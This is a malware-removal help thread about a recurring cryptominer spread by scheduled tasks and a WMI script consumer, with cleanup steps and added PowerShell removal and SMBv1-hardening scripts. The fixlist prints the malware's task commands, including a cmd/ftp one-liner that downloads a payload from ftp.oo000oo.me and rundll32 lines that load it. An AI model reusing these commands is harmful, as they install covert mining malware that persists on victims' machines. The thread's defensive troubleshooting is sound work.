Miner problems


Orma

All of this started 1½~ weeks ago. Bitdefender (free) started blocking 2 things, "item.dat" and "lsmo.exe". The second one got blocked every 3 hours on the second. This went on for around a week, then suddenly nothing for a day or two. Then I noticed on my CPU/RAM/HDD monitor that my CPU was overworking itself to death and saw a file called "lsmose.exe" eating away at full power. I manually killed it and scanned the file with Bitdefender, which found nothing wrong with it, and deleted it from my HDD.
Then anywhere in a 3-8h window this guy would come back, so I froze its process with Process Explorer so I didn't have to bother with it. This worked for a while, but then a new file called "lsmosee.exe" got added, killed the first one and started chewing CPU.
Now both of these got added every time, but only one of them would start up. Also, at the same time these two were downloaded, something killed my Task Manager if I had it open (but ignored Process Explorer), and it added 3 new scheduled tasks for system startup called "Mysa1", "Mysa2" and "ok". Mysa1 and ok wanted to start up DLL files in the same folder as the miner called "item.dat" and "ok.dat"; item.dat was stopped a week ago and never seen again, and I never saw ok.dat, which was probably stopped even earlier. Mysa2 does something with cmd, which I guess you will see in the logs.

Yesterday Bitdefender stopped and quarantined lsmose.exe and tagged it as a "trojan generic", but I manually scanned lsmosee.exe and it found nothing wrong with it. Also, the schedules point to windows\debug, where the 2 miners always appeared, but after Bitdefender stopped lsmose.exe, lsmosee.exe started appearing in windows\help.

lsmosee.exe was still on my HDD when I did the logs, and the system startup schedules are also there, but I turned them to inactive in case of a PC crash or sudden restart. I always delete the schedules before I restart my PC, but they get reactivated even if I don't delete them when the miner drop happens. Don't really dare to swap out from Bitdefender atm since it's keeping part of the problem at bay.

Edit: I also did the scans with lsmose.exe on my HDD before Bitdefender got updated and caught it, and the first scan did not detect it.
Logs:

scan_170727-052925.txt

FRST.txt

Addition.txt


Hello Orma,

Do the following:

Download AdwCleaner and save it on your desktop.

  1. Close all open programs and Internet browsers (you may want to print out or write down these instructions first).
  2. Double click on adwcleaner.exe to run the tool.
  3. Click on the Scan button.
  4. After the scan has finished, click on the Clean button.
  5. Confirm each time with OK.
  6. You will be prompted to restart your computer. A text file will open in Notepad after the restart (this is the log of what was removed), which you can save on your desktop.
  7. Attach that log file to your reply by clicking the More Reply Options button to the lower-right of where you type in your reply.
    NOTE: If you lose that log file for any reason, you can find it at C:\AdwCleaner on your computer.

Download Junkware Removal Tool and save it on your desktop.

  1. Run the tool by double-clicking it.
  2. The tool will open and start scanning your system.
  3. Please be patient as this can take a while to complete depending on your system's specifications.
  4. On completion, a log is saved to your desktop and will automatically open.
  5. Attach the JRT log file to a reply by clicking the More Reply Options button to the lower-right of where you type in your reply.

Copy the below code to Notepad; Save As fixlist.txt to your Desktop.

HKU\S-1-5-21-3177596847-2901113629-1807750644-1002\...\Policies\system: [LogonHoursAction] 2
HKU\S-1-5-21-3177596847-2901113629-1807750644-1002\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
HKU\S-1-5-21-3177596847-2901113629-1807750644-1002\...\MountPoints2: {cdb840ab-1c93-11e1-8fcf-5404a669046c} - G:\Startme.exe
HKU\S-1-5-21-3177596847-2901113629-1807750644-1002\...\MountPoints2: {e4ed8a6f-7be8-11e1-9bef-5404a669046c} - F:\autorun.exe
HKU\S-1-5-21-3177596847-2901113629-1807750644-1002\...409d6c4515e9\InprocServer32: [Default-shell32]  <==== ATTENTION
HKU\S-1-5-21-3177596847-2901113629-1807750644-1005\...\MountPoints2: {cdb840ab-1c93-11e1-8fcf-5404a669046c} - G:\Startme.exe
HKU\S-1-5-21-3177596847-2901113629-1807750644-1005\...\MountPoints2: {e4ed8a6f-7be8-11e1-9bef-5404a669046c} - F:\autorun.exe
GroupPolicy\User: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{37c554d5-07d7-4f98-8cc9-15306de97a4f} <==== ATTENTION (Restriction - IP)
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
URLSearchHook: HKLM-x32 - (No Name) - {687578b9-7132-4a7a-80e4-30ee31099e03} - No File
URLSearchHook: HKU\S-1-5-21-3177596847-2901113629-1807750644-1002 - (No Name) - {687578b9-7132-4a7a-80e4-30ee31099e03} - No File
URLSearchHook: HKU\S-1-5-21-3177596847-2901113629-1807750644-1005 - (No Name) - {687578b9-7132-4a7a-80e4-30ee31099e03} - No File
Toolbar: HKU\S-1-5-21-3177596847-2901113629-1807750644-1002 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
Toolbar: HKU\S-1-5-21-3177596847-2901113629-1807750644-1002 -> No Name - {687578B9-7132-4A7A-80E4-30EE31099E03} -  No File
Toolbar: HKU\S-1-5-21-3177596847-2901113629-1807750644-1005 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
Toolbar: HKU\S-1-5-21-3177596847-2901113629-1807750644-1005 -> No Name - {687578B9-7132-4A7A-80E4-30EE31099E03} -  No File
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @SonyCreativeSoftware.com/Media Go,version=1.0 -> C:\Program Files (x86)\Sony\Media Go\npmediago.dll [No File]
CHR HKU\S-1-5-21-3177596847-2901113629-1807750644-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pacgpkgadgmibnhpdidcnfafllnmeomc] - C:\Users\Ormathon\AppData\Local\CRE\pacgpkgadgmibnhpdidcnfafllnmeomc.crx <not found>
2011-11-28 02:59 - 2011-11-28 02:59 - 0000032 _____ () C:\Program Files\plugins-04041e-fe8.dat
2012-07-22 10:30 - 2013-07-31 07:53 - 0000027 _____ () C:\Program Files\plugins.dat
2017-07-20 22:06 - 2017-07-20 22:06 - 0000694 _____ () C:\Users\Ormathon\AppData\Local\recently-used.xbel
2012-02-18 20:32 - 2015-12-02 10:51 - 0007602 _____ () C:\Users\Ormathon\AppData\Local\resmon.resmoncfg
2017-06-10 09:35 - 2017-06-10 09:35 - 0030973 _____ () C:\ProgramData\agent.update.1497080152.bdinstall.bin
2016-03-05 13:09 - 2016-03-05 13:09 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2017-06-14 21:09 - 2017-06-14 21:09 - 0000016 _____ () C:\ProgramData\mntemp
C:\$Recycle.Bin\S-1-5-21-3177596847-2901113629-1807750644-1002\$76fbc2f48c436a4d1ef7a11d2b0dc4bc
C:\$Recycle.Bin\S-1-5-18\$76fbc2f48c436a4d1ef7a11d2b0dc4bc
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} =>  -> No File
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} =>  -> No File
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} =>  -> No File
ShellIconOverlayIdentifiers-x32: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  -> No File
ShellIconOverlayIdentifiers-x32: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  -> No File
ShellIconOverlayIdentifiers-x32: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} =>  -> No File
ShellIconOverlayIdentifiers-x32: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} =>  -> No File
ShellIconOverlayIdentifiers-x32: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  -> No File
ShellIconOverlayIdentifiers-x32: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} =>  -> No File
ShellIconOverlayIdentifiers-x32: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  -> No File
ShellIconOverlayIdentifiers-x32: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} =>  -> No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} =>  -> No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} =>  -> No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} =>  -> No File
ContextMenuHandlers01: [###MegaContextMenuExt] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} =>  -> No File
Task: {6EE6F4AC-36AE-4AA4-8666-67953D87CEA7} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {A7EE2607-833F-4935-ABEA-B6B9CB7F1027} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
Task: {FA9A27FE-5D5E-45DB-8083-D1C9EF182238} - System32\Tasks\Mysa2 => cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION
C:\Program Files (x86)\Conduit
C:\Users\Ormathon\AppData\Roaming\getrighttogo
C:\Program Files (x86)\adawaretb
C:\Program Files (x86)\searchresults1
C:\Program Files (x86)\uTorrentControl2\uTorrentControl2ToolbarHelper.exe
C:\Program Files (x86)\utorrentcontrol2
Reg: reg delete "HKEY_USERS\S-1-5-21-3177596847-2901113629-1807750644-1002\SOFTWARE\APPDATALOW\SOFTWARE\CONDUIT" /f
Reg: reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432NODE\CONDUIT" /f
Reg: reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\APPLICATIONS\ILIVIDSETUPV1.EXE" /f
Reg: reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{6C97A91E-4524-4019-86AF-2AA2D567BF5C}" /f
Reg: reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\ILIVID" /f
Reg: reg delete "HKEY_USERS\S-1-5-21-3177596847-2901113629-1807750644-1002\SOFTWARE\ILIVID" /f
Reg: reg delete "HKEY_USERS\S-1-5-21-3177596847-2901113629-1807750644-1002\SOFTWARE\SEARCHRESULTS1" /f
Reg: reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432NODE\ILIVID" /f
Reg: reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432NODE\UTORRENTCONTROL2" /f

Close Notepad.

NOTE: It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST64 and press the Fix button just once and wait.

If the tool needed a restart please make sure you let the system restart normally and let the tool complete its run after restart.

The tool will make a log on the Desktop (Fixlog.txt). Attach it to your reply.

Note: If the tool warns you about an outdated version please download and run the updated version.


I ran everything, but is it normal for FRST64 to take 2h+ to finish? It finished editing the log it made after 1 min, but the program is still running. It uses 24-25% CPU constantly and super low RAM... feels like it's done but forgot how to turn itself off. Should I kill its process or just let it run in the background? When I started using the programs I had already turned off the browser and all the other programs running in the background like Skype/Steam etc.

Edit: Let it run for 4h. Gave up on it at that point since it had 0 fluctuations in CPU and RAM usage during that time, and I killed its process since I could not shut it down any other way. CPU usage moved from 24.5% to 25% (but it never went above 25% for some reason), but it was solid there. The RAM usage was at a constant super low number with 0 fluctuations.

Here are the logs:

AdwCleaner[S0].txt

JRT.txt

Fixlog.txt

AdwCleaner[C0].txt


Some updates. Bitdefender has been updated a few times; now it quarantined lsmoee.exe. The thing that is adding scheduled tasks is still lurking somewhere, and I'm getting one more scheduled task called "Mysa3".
Now Bitdefender has blocked and deleted this one but ignores Mysa1, Mysa2 and ok even with a manual scan.


Changing tools.

Download RogueKiller Portable and save it to your desktop.

For 32-bit (x86) systems download http://www.adlice.com/download/roguekiller/?wpdmdl=59&ind=aHR0cDovL2Rvd25sb2FkLmFkbGljZS5jb20vYXBpP2FjdGlvbj1kb3dubG9hZCZhcHA9cm9ndWVraWxsZXImdHlwZT14ODY
For 64-bit (x64) systems download http://www.adlice.com/download/roguekiller/?wpdmdl=59&ind=aHR0cDovL2Rvd25sb2FkLmFkbGljZS5jb20vYXBpP2FjdGlvbj1kb3dubG9hZCZhcHA9cm9ndWVraWxsZXImdHlwZT14NjQ

Close all programs and disconnect any USB or external drives before running the tool.

• Right-click RogueKiller and select Run As Administrator to run the tool.
• Once the Prescan has finished, click Scan.
• Once the Status box shows "Scan Finished", click on the "Report" button and attach the scan log to your reply.


Close all programs and disconnect any USB or external drives before running the tool.

  • Double-click RogueKiller.exe to run the tool again (Vista/7/8/10 users: right-click and select Run As Administrator).
  • Once the Prescan has finished, click Scan.
  • Once the Status box shows "Scan Finished":
    • Click the Registry Tab and select the following items:
      [PUP.Gen0] (X64) HKEY_USERS\S-1-5-21-3177596847-2901113629-1807750644-1005\SOFTWARE\Microsoft\Internet Explorer\Toolbar\WebBrowser | {687578B9-7132-4A7A-80E4-30EE31099E03} :   -> Found
      [PUP.Gen0] (X86) HKEY_USERS\S-1-5-21-3177596847-2901113629-1807750644-1005\SOFTWARE\Microsoft\Internet Explorer\Toolbar\WebBrowser | {687578B9-7132-4A7A-80E4-30EE31099E03} :   -> Found
      [PUP.Gen0] (X64) HKEY_USERS\S-1-5-21-3177596847-2901113629-1807750644-1005\SOFTWARE\Microsoft\Internet Explorer\URLSearchHooks | {687578b9-7132-4a7a-80e4-30ee31099e03} :   -> Found
      [PUP.Gen0] (X86) HKEY_USERS\S-1-5-21-3177596847-2901113629-1807750644-1005\SOFTWARE\Microsoft\Internet Explorer\URLSearchHooks | {687578b9-7132-4a7a-80e4-30ee31099e03} :   -> Found
      [PUM.Policies] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0  -> Found
      [PUM.Policies] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0  -> Found
    • Click the Files Tab and select the following items:
      [Root.ZeroAccess][Folder] C:\$Recycle.Bin\S-1-5-18\$76fbc2f48c436a4d1ef7a11d2b0dc4bc\L -> Found
      [Root.ZeroAccess][Folder] C:\$Recycle.Bin\S-1-5-18\$76fbc2f48c436a4d1ef7a11d2b0dc4bc\U -> Found
      [Root.ZeroAccess][Folder] C:\$Recycle.Bin\S-1-5-21-3177596847-2901113629-1807750644-1002\$76fbc2f48c436a4d1ef7a11d2b0dc4bc\L -> Found
      [Root.ZeroAccess][Folder] C:\$Recycle.Bin\S-1-5-21-3177596847-2901113629-1807750644-1002\$76fbc2f48c436a4d1ef7a11d2b0dc4bc\U -> Found
    • Click the Delete button.

  • Attach the RogueKiller report to your next reply.
    • The log can also be found on your desktop labeled (RKreport[X]_D_xxdatexx_xtimex.txt)
    • The highest number of [X], is the most recent Delete log.



Noticed something while I had Process Explorer up on the second monitor and the files and schedules got dumped. ping.exe and netsh.exe got started up, and after that scrcons.exe started up, probably something else as well, but I missed it because only scrcons.exe is active for more than 2~ seconds.

Edit: Every 3 hours on the second, something is triggered and downloads the schedules and that 32[1].zip file. Haven't seen Bitdefender popping up saying it blocked the lsmose files anymore.


Let's take a deeper look at the system.

Download avz4.zip from here

  • Unzip it to your desktop to a folder named avz4
  • Double click on AVZ.exe to run it.
  • Run an update by clicking the Auto Update button on the Right of the Log window: avz-update-button.png
  • Click Start to begin the update
    Note: If you receive an error message, chose a different source, then click Start again
  • After the update, from the "File" menu, choose "Standard Scripts"
  • Put a check next to item 2: Advanced System Analysis
  • Click Execute selected scripts
  • At the next prompt, click the OK button
  • Let the scan run and click "OK" when the completion prompt pops up
  • Now Close out of the Standard Scripts window, and exit AVZ
  • Navigate to the avz4 folder and locate the folder LOG
  • Inside the LOG folder you will find virusinfo_syscheck.htm and virusinfo_syscheck.zip
  • Attach the Compressed file, virusinfo_syscheck.zip, to your next reply.


Close all windows then double click on AVZ.exe

  • Click File > Custom scripts
  • Copy & paste the below code in to the text box in the program
    Note: When you run the script, your PC will be restarted
    begin
    SetAVZGuardStatus(True);
    SearchRootkit(true, true);
     BC_DeleteFile('c:\windows\debug\item.dat');
     DeleteFile('C:\Windows\system32\Tasks\Mysa1','64');
     DeleteFile('C:\Windows\system32\Tasks\Mysa2','64');
     BC_DeleteFile('c:\windows\debug\ok.dat');
     DeleteFile('C:\Windows\system32\Tasks\ok','64');
    ExecuteSysClean;
    BC_Activate;
    RebootWindows(true);
    end.
  • Click Run
  • Restart your PC if it doesn't do it automatically.


Attach a fresh AVZ log.

Let me know of any problems you may have encountered with the above instructions and also let me know how things are running now!

So far no new schedules have popped up and Bitdefender is being quiet. The PC has been on and connected to the net for 14h~ straight.

Edit: Well, it worked for a while. Mysa 1-2-3, ok, 32[1].zip and lsmosee.exe got dropped after the PC had been on for 18h~.


This is an older tool used to detect and remove rootkits.

Read carefully and follow these steps.

  • Download TDSSKiller and save it to your Desktop.
  • Double-click on TDSSKiller.exe to run the application.
  • Click Change parameters
  • Check the boxes next to Verify Driver Digital Signature and Detect TDLFS file system, then click OK
  • Click on the Start Scan button to begin the scan and wait for it to finish.
    NOTE: Do not use the computer during the scan!
  • During the scan it will look similar to the image below:
  • When it finishes, you will either see a report that no threats were found like below:
    If no threats are found at this point, just click the Report selection on the top right of the form to generate a log. A log file report will pop up, which you can just close since the report file is already saved.
  • If any infection or suspected items are found, you will see a window similar to below:
    • If you have files that are shown to fail signature check do not take any action on these. Make sure you select Skip. I will tell you what to do with these later. They may not be issues at all.
    • If Suspicious objects are detected, the default action will be Skip. Leave the default set to Skip.
    • If Malicious objects are detected, they will show in the Scan results. TDSSKiller automatically selects an action (Cure or Delete) for malicious objects
    • Make sure that Cure is selected. Important! - If Cure is not available, please choose Skip instead. Do not choose Delete unless instructed to do so.

  • Click Continue to apply selected actions.
  • A reboot may be required to complete disinfection. A window will appear
    Reboot immediately if TDSSKiller states that one is needed.
  • Whether an infection is found or not, a log file should have already been created on your C: drive (or whatever drive you boot from) in the root folder named something like TDSSKiller.2.1.1_27.12.2009_14.17.04_log.txt which is based on the program version # and date and time run.
  • Attach this log to your next reply.


@Orma go ahead and delete the "fuckyoumm2_consumer" script following the instructions in the Bleeping Computer article.

@robertsb41 though I applaud your initiative, posting advice to others in this part of the forum is prohibited.  Always bring stuff like that to the attention of the Malware Removal Expert assisting the user that is infected.

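The two persistence mechanisms in this thread (the Mysa*/ok scheduled tasks listed in the FRST fixlist above, and the WMI subscription behind the scrcons.exe process Orma saw start every three hours) can be enumerated and removed from PowerShell without a third-party tool. The script below is an added example written for this page; it is not code from the thread, from the helpers, or from Emsisoft. It takes the task names and the consumer name "fuckyoumm2_consumer" from the log; the regular expression, the -Remove switch and the function names are this example's own choices. It uses schtasks.exe and the Get-WmiObject cmdlets so that it also runs on Windows 7, which lacks Get-ScheduledTask.

```powershell
# Added example, not code from the thread or from Emsisoft: list the scheduled tasks and the
# permanent WMI subscription seen in Orma's FRST log, and remove them with -Remove.
# scrcons.exe is the host process that executes ActiveScriptEventConsumer script text, which
# is why deleting the tasks and the .dat files alone did not help: the subscription re-created
# them on its timer. Run from an elevated PowerShell prompt.
param([switch]$Remove)

$knownBadTaskNames    = @('Mysa1', 'Mysa2', 'Mysa3', 'ok')      # names from the FRST log
$knownBadConsumerName = 'fuckyoumm2_consumer'                   # name from the FRST log
# "Task To Run" values matching what the log showed: rundll32 loading a .dat out of
# windows\debug or windows\help, or a scripted ftp download (ftp -s:). Regex is this example's.
$suspiciousCommand    = '(?i)rundll32\.exe\s+c:\\windows\\(debug|help)\\\S+\.dat|\bftp\s+-s:'
$wmiNs                = 'root\subscription'
$nameRef              = [regex]'Name=["'']([^"'']+)["'']'       # parses __EventFilter.Name="x"

function Get-SuspiciousTask {
    # schtasks /v CSV repeats its header row on some builds; drop those rows after parsing.
    schtasks.exe /query /fo CSV /v | ConvertFrom-Csv |
        Where-Object { $_.TaskName -ne 'TaskName' } |
        Where-Object {
            ($knownBadTaskNames -contains ($_.TaskName -replace '^\\', '')) -or
            ($_.'Task To Run' -match $suspiciousCommand)
        } |
        Select-Object TaskName, 'Task To Run', 'Next Run Time', Status
}

function Get-WmiSubscription {
    # A permanent subscription is three objects: an __EventFilter (the WQL trigger, often a
    # timer), an __EventConsumer (the payload) and a __FilterToConsumerBinding tying them
    # together. The binding stores the other two as reference strings such as
    # __EventFilter.Name="x", so resolve them by name.
    $filters   = Get-WmiObject -Namespace $wmiNs -Class __EventFilter
    $consumers = Get-WmiObject -Namespace $wmiNs -Class __EventConsumer
    foreach ($b in Get-WmiObject -Namespace $wmiNs -Class __FilterToConsumerBinding) {
        $fName = $nameRef.Match($b.Filter).Groups[1].Value
        $cName = $nameRef.Match($b.Consumer).Groups[1].Value
        $f = $filters   | Where-Object { $_.Name -eq $fName } | Select-Object -First 1
        $c = $consumers | Where-Object { $_.Name -eq $cName } | Select-Object -First 1
        [pscustomobject]@{
            Filter       = $fName
            Query        = $f.Query
            Consumer     = $cName
            ConsumerType = $c.__CLASS
            ScriptText   = $c.ScriptText            # set only on ActiveScriptEventConsumer
            CommandLine  = $c.CommandLineTemplate   # set only on CommandLineEventConsumer
        }
    }
}

function Remove-WmiSubscription([string]$ConsumerName) {
    # Delete the binding first so the filter can no longer fire the consumer, then the filter
    # it referenced, then the consumer. The log showed one filter/consumer pair; on a machine
    # with legitimate subscriptions, check that the filter is not shared before removing it.
    $pattern = 'Name=["'']{0}["'']' -f [regex]::Escape($ConsumerName)
    Get-WmiObject -Namespace $wmiNs -Class __FilterToConsumerBinding |
        Where-Object { $_.Consumer -match $pattern } |
        ForEach-Object {
            $fName = $nameRef.Match($_.Filter).Groups[1].Value
            Remove-WmiObject -InputObject $_
            Get-WmiObject -Namespace $wmiNs -Class __EventFilter -Filter "Name='$fName'" | Remove-WmiObject
        }
    Get-WmiObject -Namespace $wmiNs -Class __EventConsumer -Filter "Name='$ConsumerName'" | Remove-WmiObject
}

Write-Host '== Scheduled tasks matching the log =='
$tasks = @(Get-SuspiciousTask)
$tasks | Format-Table -AutoSize | Out-String | Write-Host

Write-Host '== Permanent WMI subscriptions (root\subscription) =='
$subs = @(Get-WmiSubscription)
$subs | Format-List | Out-String | Write-Host

if ($Remove) {
    foreach ($t in $tasks) { schtasks.exe /delete /tn $t.TaskName /f }
    foreach ($s in ($subs | Where-Object { $_.Consumer -eq $knownBadConsumerName })) {
        Remove-WmiSubscription -ConsumerName $s.Consumer
    }
    # Paths from the log; the files return if anything above survived, so recheck later.
    Remove-Item -Force -ErrorAction SilentlyContinue `
        'C:\Windows\debug\item.dat', 'C:\Windows\debug\ok.dat', 'C:\Windows\help\lsmosee.exe'
}
```

Run it once without -Remove and read the Query and ScriptText columns: a filter built on __IntervalTimerInstruction or a timer WQL query, paired with an ActiveScriptEventConsumer whose script writes to c:\windows\debug, is the shape this thread describes. Only then run it again with -Remove, and watch the three-hour mark that Orma identified to confirm nothing re-creates the tasks.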

There we go, deleted it as instructed and cleaned up the Mysa1-2 and ok schedules. Will see in 6~h if it pops back again, since that is the next time the 9h mark hits.

Thanks for all your help so far, Kevin :). Also, will something to avoid this be added to Emsisoft software in the future (unless it's already in)?


After some research, this infection appears to have been dropped by the EternalBlue-DoublePulsar exploit that exploits vulnerable versions of SMB on unpatched Windows systems.
 
Would it be possible to get copies of all the EAM Forensics, Surf Protection, File Guard, Behavior Blocker, Scan, and Update logs?  You can zip all the logs into a single ZIP file and attach the ZIP archive to your reply.

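If the initial access really was EternalBlue-DoublePulsar, the cleanup above is only half the job: the machine has to stop exposing SMBv1 on TCP 445 or it will be re-infected. The script below is an added example for this page, not code from the thread or from Emsisoft. The SMB1 registry value under LanmanServer\Parameters and the netsh advfirewall syntax are Microsoft-documented; the KB numbers are the originally released MS17-010 packages for Windows 7 SP1 / Server 2008 R2 (security-only and monthly rollup) and are an assumption of this example in the sense that later cumulative rollups supersede them without listing them, so an empty Get-HotFix result is a prompt to check Windows Update history, not proof the box is unpatched. The firewall rule name, the -Harden switch and the function names are this example's own.

```powershell
# Added example, not code from the thread or from Emsisoft: report whether this machine still
# offers what EternalBlue needs (SMBv1 served on TCP 445 by an unpatched LanmanServer) and,
# with -Harden, disable SMBv1 and block inbound 445 in Windows Firewall.
# Run elevated. The SMB1 registry change applies after a reboot, and blocking 445 inbound
# stops other machines from reaching shares on this PC.
param([switch]$Harden)

$lanman      = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
# Assumed: original MS17-010 packages for Windows 7 SP1 / 2008 R2 (see the note above).
$ms17010Win7 = @('KB4012212', 'KB4012215')

function Get-Smb1ServerState {
    # No SMB1 value means the protocol is on (the default on Windows 7 / 2008 R2).
    $v = (Get-ItemProperty -Path $lanman -ErrorAction SilentlyContinue).SMB1
    if ($null -eq $v) { return 'Enabled (default; value not set)' }
    if ($v -eq 0)     { return 'Disabled' }
    return "Enabled (SMB1=$v)"
}

function Get-Port445Listener {
    # The Server service normally listens on 0.0.0.0:445. Whether the internet can reach it
    # depends on the router/ISP and cannot be answered from the host; treat a listener plus
    # an unknown perimeter as exposed.
    netstat.exe -ano -p TCP | Select-String -Pattern ':445\s+\S+\s+LISTENING'
}

function Get-Ms17010Hotfix {
    Get-HotFix | Where-Object { $ms17010Win7 -contains $_.HotFixID } |
        Select-Object HotFixID, InstalledOn
}

Write-Host ('SMBv1 server        : ' + (Get-Smb1ServerState))
$listeners = @(Get-Port445Listener | ForEach-Object { $_.Line.Trim() })
Write-Host ('Listening on 445    : ' + $(if ($listeners.Count) { $listeners -join '; ' } else { 'none' }))
$kb = @(Get-Ms17010Hotfix)
if ($kb.Count) {
    Write-Host ('MS17-010 package(s) : ' + (($kb | ForEach-Object { $_.HotFixID }) -join ', '))
} else {
    Write-Host ('MS17-010 package(s) : none of ' + ($ms17010Win7 -join '/') + ' listed by Get-HotFix; check update history')
}

if ($Harden) {
    # Documented way to turn the SMBv1 server off on Windows 7 / 2008 R2 (reboot to apply).
    Set-ItemProperty -Path $lanman -Name SMB1 -Type DWord -Value 0 -Force
    # Belt and braces: refuse inbound 445 even if something re-enables SMB1 later.
    netsh.exe advfirewall firewall add rule name="Block inbound SMB 445 (example)" dir=in action=block protocol=TCP localport=445
    Write-Host 'SMBv1 disabled in the registry (reboot to apply) and inbound TCP 445 blocked in Windows Firewall.'
}
```

On Windows 8.1 and 10 the cleaner route is to remove the SMB1 optional feature (Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol) rather than the registry value, but the listener and firewall checks apply unchanged. Whichever way SMBv1 is turned off, the MS17-010 patch state still matters for any other host on the same LAN that keeps SMBv1 on, because a worm on one machine will scan the others.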
